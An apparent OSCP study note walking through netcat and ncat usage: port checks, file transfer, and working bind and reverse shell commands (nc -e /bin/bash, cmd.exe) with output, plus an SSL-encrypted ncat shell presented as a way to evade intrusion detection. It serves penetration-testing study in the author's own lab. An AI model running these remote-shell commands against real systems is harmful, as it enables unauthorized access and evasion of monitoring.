OSCP Note - Common use of Netcat(nc) and Ncat
0x00 TL;DR
The article records some ways to use nc.
- Determine if the target port is open
- Connecting to a TCP/UDP Port
- Listening on a TCP/UDP Port
- Transferring Files with Netcat
- Remote Administration with Netcat
- Ncat:more security’s nc
0x01 Determine if the target port is open
- Port open
1 | [ec2-user@ip-10-0-0-64 ~]$ nc -vz 10.0.0.64 22 |
- Port close
1 | [ec2-user@ip-10-0-0-64 ~]$ nc -vz 10.0.0.64 23 |
0x02 Connecting to a TCP/UDP Port
Useful:
- check port is open or closed
- read a banner
- To connect to a network service manually
example:
1 | [ec2-user@ip-10-0-0-64 ~]$ nc -nv 10.0.0.64 22 |
0x03 Listening on a TCP/UDP Port
Useful:
- network debugging client applications
- otherwise receiving a TCP/UDP network connection
Server side listen TCP port 4444:
1 | [ec2-user@ip-10-0-0-64 ~]$ nc -nvlp 4444 |
Use netstat can see TCP port 4444 is open.1
2
3
4[ec2-user@ip-10-0-0-64 ~]$ sudo netstat -nltp | grep 4444
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 7427/nc
tcp6 0 0 :::4444 :::* LISTEN 7427/nc
[ec2-user@ip-10-0-0-64 ~]$
Clienr side can connect this TCP port and chat with server side.1
2
3
4
5[ec2-user@ip-10-0-0-64 ~]$ nc -nv 10.0.0.64 4444
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.64:4444.
aaaa
aaaaaaaaaaaaaaaaa
0x04 Transferring Files with Netcat
Note the Windows Firewall configuration.
Text and binary file all support.
Server side(Target machine):1
2
3D:\netcat-win32-1.12>nc64.exe -nlvp 4444 > wget.exe
listening on [any] 4444 ...
connect to [10.0.0.39] from (UNKNOWN) [52.80.67.xxx] 59980
Client side:1
2
3
4[ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444 < wget.exe
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 54.222.196.xxx:4444.
Ncat: 308736 bytes sent, 0 bytes received in 0.62 seconds.
0x05 Remote Administration with Netcat
Netcat can take an executable file and redirect the input(stdin), output(stdout), and error messages(stderr) to a TCP/UDP port rather than the default console.
nc Bind Shell
Service side(Windows):1
2
3D:\netcat-win32-1.12>nc -nlvp 4444 -e cmd.exe
listening on [any] 4444 ...
connect to [10.0.0.39] from (UNKNOWN) [52.80.67.111] 60420
Linux can use this command bind shell:1
nc -nlvp 4444 -e /bin/bash
client side:1
2
3
4
5
6
7
8
9
10
11[ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 54.222.196.xxx:4444.
Microsoft Windows [▒汾 10.0.14393]
(c) 2016 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒
D:\netcat-win32-1.12>whoami
whoami
ec2amaz-okar8bt\administrator
D:\netcat-win32-1.12>
nc Reverse Shell
Service side:1
2D:\netcat-win32-1.12>nc -nlvp 4444
listening on [any] 4444 ...
Client side:1
2
3[ec2-user@ip-10-0-0-64 temp]$ nc -nv 54.222.196.xxx 4444 -e /bin/bash
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 54.222.196.xxx:4444.
Then you can execute command in this reverse shell, like this:1
2
3
4
5D:\netcat-win32-1.12>nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.0.0.39] from (UNKNOWN) [52.80.67.111] 40908
id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user),4(adm),10(wheel),190(systemd-journal)
0x06 Ncat:more security’s nc
- Encryption of the bind or reverse shell will aid the penetration tester in avoiding intrusion detection systems
- Not expose the penetrated machines to unwanted IP addresses.
Server side:
1 | [ec2-user@ip-10-0-0-64 temp]$ ncat --exec /bin/bash --allow 54.222.196.xxx -vnl 4444 --ssl |
Client side:1
2
3
4
5
6D:\NcatPortable-master\NcatPortable-master>ncat -v 52.80.67.xxx 4444 --ssl
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: SSL connection to 52.80.67.xxx:4444.
Ncat: SHA-1 fingerprint: C900 5192 97CA 45E9 0B30 DB8E D76A D8D3 2673 3BF3
id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user),4(adm),10(wheel),190(systemd-journal)
Then you can execute command in this bind shell.
0x07 Command summary
1 | nc -vz 10.0.0.64 22 |